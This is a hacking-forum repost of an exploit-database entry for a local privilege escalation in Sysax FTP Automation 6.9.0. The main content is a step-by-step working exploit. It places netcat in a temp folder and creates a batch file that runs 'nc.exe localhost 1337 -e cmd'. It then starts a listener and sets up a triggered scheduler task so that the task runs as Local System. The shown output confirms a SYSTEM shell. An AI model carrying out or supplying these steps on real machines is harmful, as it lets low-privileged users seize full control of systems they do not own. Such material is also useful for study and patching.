Sysax FTP Automation 6.9.0 - Privilege Escalation - 黑帽漏洞数据库

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

赤队小组-代号1949（原CHT攻防小组）在这个瞬息万变的网络时代，我们保持初心，创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识，您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告，请注册用户查看我们的使用与隐私策略，谢谢您的配合。小组成员可以获取论坛隐藏内容！

TheHackerWorld官方

发布于2022年11月3日2年前

# Exploit Author: bzyo (@bzyo_)
# Exploit Title: Sysax FTP Automation 6.9.0 - Privilege Escalation
# Date: 03-20-2022
# Vulnerable Software: Sysax FTP Automation 6.9.0
# Vendor Homepage: https://www.sysax.com/
# Version: 6.9.0
# Software Link: https://www.sysax.com/download/sysaxauto_setup.msi
# Tested on: Windows 10 x64

# Details:
Sysax Scheduler Service runs as Local System. By default the application allows for low privilege users to create/run backup jobs other than themselves.  By removing the option to run as current user or another, the task will run as System.  A low privilege user could abuse this and escalate their privileges to local system.

# Prerequisites:
To successfully exploit this vulnerability, an attacker must already have local access to a system running Sysax FTP Automation using a low privileged user account

# Exploit:
Logged in as low privileged account

1. Create folder c:\temp
2. Download netcat (nc.exe) to c:\temp
3. Create file 'pwn.bat' in c:\temp with contents
	c:\temp\nc.exe localhost 1337 -e cmd
4. Open command prompt and netcat listener
	nc -nlvvp 1337
5. Open sysaxschedscp.exe from C:\Program Files (x86)\SysaxAutomation
6. Select Setup Scheduled/Triggered Tasks
	- Add task (Triggered)
	- Update folder to monitor to be c:\temp
	- Check 'Run task if a file is added to the monitor folder or subfolder(s)'
	- Choose 'Run any other Program' and choose c:\temp\pwn.bat
	- Uncheck 'Login as the following user to run task'
	- Finish and Save
7. Create new text file in c:\temp
8. Check netcat listener
	C:\WINDOWS\system32>whoami
	whoami
	nt authority\system

登录

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

Sysax FTP Automation 6.9.0 - Privilege Escalation

精选回复

创建帐户或登录后发表意见

最近浏览 0

帐户

导航

搜索